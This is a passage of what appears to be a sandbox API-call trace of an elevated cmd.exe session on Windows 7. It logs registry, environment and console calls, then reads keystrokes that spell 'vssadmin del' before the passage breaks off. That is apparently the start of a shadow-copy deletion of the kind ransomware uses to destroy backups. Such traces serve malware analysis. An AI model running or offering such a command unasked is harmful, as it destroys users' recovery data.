lpcbData=0x1eed24*=0x1000 | out: lpType=0x1eed20*=0x4, lpData=0x1eed40*=0x0, lpcbData=0x1eed24*=0x4) returned 0x0 [0124.359] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eed20, lpData=0x1eed40, lpcbData=0x1eed24*=0x1000 | out: lpType=0x1eed20*=0x4, lpData=0x1eed40*=0x9, lpcbData=0x1eed24*=0x4) returned 0x0 [0124.359] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eed20, lpData=0x1eed40, lpcbData=0x1eed24*=0x1000 | out: lpType=0x1eed20*=0x4, lpData=0x1eed40*=0x9, lpcbData=0x1eed24*=0x4) returned 0x0 [0124.359] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eed20, lpData=0x1eed40, lpcbData=0x1eed24*=0x1000 | out: lpType=0x1eed20*=0x0, lpData=0x1eed40*=0x9, lpcbData=0x1eed24*=0x1000) returned 0x2 [0124.359] RegCloseKey (hKey=0x44) returned 0x0 [0124.359] time (in: timer=0x0 | out: timer=0x0) returned 0x5cb08490 [0124.359] srand (_Seed=0x5cb08490) [0124.359] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0124.359] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0124.360] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab4c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0124.360] GetProcessHeap () returned 0x2e0000 [0124.360] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x218) returned 0x2faa10 [0124.360] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2faa20, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0124.360] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0124.360] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0124.360] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0124.360] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0124.360] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0124.360] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0124.360] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0124.360] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0124.360] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0124.360] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0124.360] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0124.360] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0124.360] GetProcessHeap () returned 0x2e0000 [0124.361] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f94f0 | out: hHeap=0x2e0000) returned 1 [0124.361] GetEnvironmentStringsW () returned 0x2f8a60* [0124.361] GetProcessHeap () returned 0x2e0000 [0124.361] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xa94) returned 0x2fac30 [0124.361] FreeEnvironmentStringsW (penv=0x2f8a60) returned 1 [0124.361] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0124.361] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0124.361] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0124.361] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0124.361] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0124.361] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0124.361] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0124.361] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0124.361] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0124.361] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0124.361] GetProcessHeap () returned 0x2e0000 [0124.361] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x38) returned 0x2f6490 [0124.361] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1efb30 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0124.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x1efb30, lpFilePart=0x1efb10 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1efb10*="system32") returned 0x13 [0124.361] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0124.361] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x1ef840 | out: lpFindFileData=0x1ef840) returned 0x2fb6d0 [0124.362] FindClose (in: hFindFile=0x2fb6d0 | out: hFindFile=0x2fb6d0) returned 1 [0124.362] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x1ef840 | out: lpFindFileData=0x1ef840) returned 0x2fb6d0 [0124.362] FindClose (in: hFindFile=0x2fb6d0 | out: hFindFile=0x2fb6d0) returned 1 [0124.362] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0124.362] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0124.362] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0124.362] GetProcessHeap () returned 0x2e0000 [0124.362] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fac30 | out: hHeap=0x2e0000) returned 1 [0124.362] GetEnvironmentStringsW () returned 0x2fac30* [0124.362] GetProcessHeap () returned 0x2e0000 [0124.362] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xac4) returned 0x2f8a60 [0124.362] FreeEnvironmentStringsW (penv=0x2fac30) returned 1 [0124.362] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab4c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0124.362] GetProcessHeap () returned 0x2e0000 [0124.362] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f6490 | out: hHeap=0x2e0000) returned 1 [0124.362] GetProcessHeap () returned 0x2e0000 [0124.362] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x4016) returned 0x2fac30 [0124.363] GetProcessHeap () returned 0x2e0000 [0124.363] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fac30 | out: hHeap=0x2e0000) returned 1 [0124.363] GetConsoleOutputCP () returned 0x1b5 [0124.380] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab4bfe0 | out: lpCPInfo=0x4ab4bfe0) returned 1 [0124.380] GetUserDefaultLCID () returned 0x409 [0124.381] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ab47b50, cchData=8 | out: lpLCData=":") returned 2 [0124.381] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efc40, cchData=128 | out: lpLCData="0") returned 2 [0124.381] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efc40, cchData=128 | out: lpLCData="0") returned 2 [0124.381] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efc40, cchData=128 | out: lpLCData="1") returned 2 [0124.381] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ab5a740, cchData=8 | out: lpLCData="/") returned 2 [0124.381] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ab5a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0124.381] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ab5a460, cchData=32 | out: lpLCData="Tue") returned 4 [0124.381] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ab5a420, cchData=32 | out: lpLCData="Wed") returned 4 [0124.381] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ab5a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0124.381] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ab5a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0124.381] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ab5a360, cchData=32 | out: lpLCData="Sat") returned 4 [0124.381] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ab5a700, cchData=32 | out: lpLCData="Sun") returned 4 [0124.381] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ab47b40, cchData=8 | out: lpLCData=".") returned 2 [0124.381] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ab5a4e0, cchData=8 | out: lpLCData=",") returned 2 [0124.381] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0124.382] GetProcessHeap () returned 0x2e0000 [0124.382] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20c) returned 0x2f95a0 [0124.382] GetConsoleTitleW (in: lpConsoleTitle=0x2f95a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0124.382] _get_osfhandle (_FileHandle=1) returned 0xa8 [0124.382] GetFileType (hFile=0xa8) returned 0x3 [0124.383] BrandingFormatString () returned 0x2f97c0 [0124.389] GetVersion () returned 0x1db10106 [0124.389] _vsnwprintf (in: _Buffer=0x1efdb0, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x1efd48 | out: _Buffer="6.1.7601") returned 8 [0124.389] _get_osfhandle (_FileHandle=1) returned 0xa8 [0124.389] GetFileType (hFile=0xa8) returned 0x3 [0124.389] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4ab56340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0124.389] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4ab56340, nSize=0x2000, Arguments=0x1efd50 | out: lpBuffer="Microsoft Windows [Version 6.1.7601]") returned 0x24 [0124.389] _get_osfhandle (_FileHandle=1) returned 0xa8 [0124.389] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 6.1.7601]", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 6.1.7601]", lpUsedDefaultChar=0x0) returned 37 [0124.389] WriteFile (in: hFile=0xa8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x1efcd8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x1efcd8*=0x24, lpOverlapped=0x0) returned 1 [0124.389] _vsnwprintf (in: _Buffer=0x4ab56340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1efd78 | out: _Buffer="\r\n") returned 2 [0124.389] _get_osfhandle (_FileHandle=1) returned 0xa8 [0124.389] GetFileType (hFile=0xa8) returned 0x3 [0124.389] _get_osfhandle (_FileHandle=1) returned 0xa8 [0124.389] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0124.389] WriteFile (in: hFile=0xa8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1efd48, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x1efd48*=0x2, lpOverlapped=0x0) returned 1 [0124.390] _vsnwprintf (in: _Buffer=0x4ab56340, _BufferCount=0x1fff, _Format="%s", _ArgList=0x1efd78 | out: _Buffer="Copyright (c) 2009 Microsoft Corporation. All rights reserved.") returned 63 [0124.390] _get_osfhandle (_FileHandle=1) returned 0xa8 [0124.390] GetFileType (hFile=0xa8) returned 0x3 [0124.390] _get_osfhandle (_FileHandle=1) returned 0xa8 [0124.390] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", lpUsedDefaultChar=0x0) returned 64 [0124.390] WriteFile (in: hFile=0xa8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x1efd48, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x1efd48*=0x3f, lpOverlapped=0x0) returned 1 [0124.390] _vsnwprintf (in: _Buffer=0x4ab56340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1efd78 | out: _Buffer="\r\n") returned 2 [0124.390] _get_osfhandle (_FileHandle=1) returned 0xa8 [0124.390] GetFileType (hFile=0xa8) returned 0x3 [0124.390] _get_osfhandle (_FileHandle=1) returned 0xa8 [0124.390] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0124.390] WriteFile (in: hFile=0xa8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1efd48, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x1efd48*=0x2, lpOverlapped=0x0) returned 1 [0124.390] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000 [0124.390] GetProcAddress (hModule=0x76b10000, lpProcName="CopyFileExW") returned 0x76b223d0 [0124.390] GetProcAddress (hModule=0x76b10000, lpProcName="IsDebuggerPresent") returned 0x76b18290 [0124.390] GetProcAddress (hModule=0x76b10000, lpProcName="SetConsoleInputExeNameW") returned 0x76b217e0 [0124.390] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.390] GetFileType (hFile=0x9c) returned 0x3 [0124.390] _setmode (_FileHandle=0, _Mode=32768) returned 16384 [0124.391] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x1efba0 | out: TokenHandle=0x1efba0*=0x0) returned 0xc000007c [0124.391] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x1efba0 | out: TokenHandle=0x1efba0*=0x50) returned 0x0 [0124.391] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x12, TokenInformation=0x1efbb0, TokenInformationLength=0x4, ReturnLength=0x1efbb8 | out: TokenInformation=0x1efbb0, ReturnLength=0x1efbb8) returned 0x0 [0124.391] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x1a, TokenInformation=0x1efbb8, TokenInformationLength=0x4, ReturnLength=0x1efbb0 | out: TokenInformation=0x1efbb8, ReturnLength=0x1efbb0) returned 0x0 [0124.391] NtClose (Handle=0x50) returned 0x0 [0124.391] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x1efb80, nSize=0x0, Arguments=0x1efb88 | out: lpBuffer="\x97c0\x2f") returned 0xf [0124.391] GetProcessHeap () returned 0x2e0000 [0124.391] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x218) returned 0x2f9be0 [0124.391] GetConsoleTitleW (in: lpConsoleTitle=0x1efbd0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0124.391] wcsstr (_Str="C:\\Windows\\system32\\cmd.exe", _SubStr="Administrator: ") returned 0x0 [0124.391] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0124.392] GetProcessHeap () returned 0x2e0000 [0124.392] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f9be0 | out: hHeap=0x2e0000) returned 1 [0124.392] LocalFree (hMem=0x2f97c0) returned 0x0 [0124.392] GetProcessHeap () returned 0x2e0000 [0124.392] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2faa10 | out: hHeap=0x2e0000) returned 1 [0124.393] _vsnwprintf (in: _Buffer=0x4ab56340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1ef8b8 | out: _Buffer="\r\n") returned 2 [0124.393] _get_osfhandle (_FileHandle=1) returned 0xa8 [0124.393] GetFileType (hFile=0xa8) returned 0x3 [0124.393] _get_osfhandle (_FileHandle=1) returned 0xa8 [0124.393] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0124.394] WriteFile (in: hFile=0xa8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ef888, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x1ef888*=0x2, lpOverlapped=0x0) returned 1 [0124.394] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0124.394] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab4c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0124.394] _vsnwprintf (in: _Buffer=0x4ab3eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1ef8c8 | out: _Buffer="C:\\Windows\\system32") returned 19 [0124.394] _vsnwprintf (in: _Buffer=0x4ab3eb86, _BufferCount=0x3eb, _Format="%c", _ArgList=0x1ef8c8 | out: _Buffer=">") returned 1 [0124.394] _get_osfhandle (_FileHandle=1) returned 0xa8 [0124.394] GetFileType (hFile=0xa8) returned 0x3 [0124.394] _get_osfhandle (_FileHandle=1) returned 0xa8 [0124.394] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32>", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32>", lpUsedDefaultChar=0x0) returned 21 [0124.394] WriteFile (in: hFile=0xa8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x1ef8b8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x1ef8b8*=0x14, lpOverlapped=0x0) returned 1 [0124.394] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.394] GetFileType (hFile=0x9c) returned 0x3 [0124.394] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.394] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.394] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.394] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e320, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0124.395] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.395] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.395] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.395] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e322, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0124.395] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.395] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.395] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.395] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e324, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0124.395] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.395] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.395] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.395] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e326, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0124.395] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.395] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.395] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.395] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e328, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0124.395] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.395] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.395] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.395] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e32a, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0124.395] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.395] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.395] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.396] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e32c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0124.396] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.396] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.396] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.396] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e32e, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0124.396] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.396] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.396] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.396] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e330, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0124.396] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.396] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.396] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.396] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e332, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0124.396] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.396] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.396] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.396] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e334, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0124.396] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.396] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.396] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.396] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e336, cchWideChar=1 | out: lpWideCharStr="l") returned 1 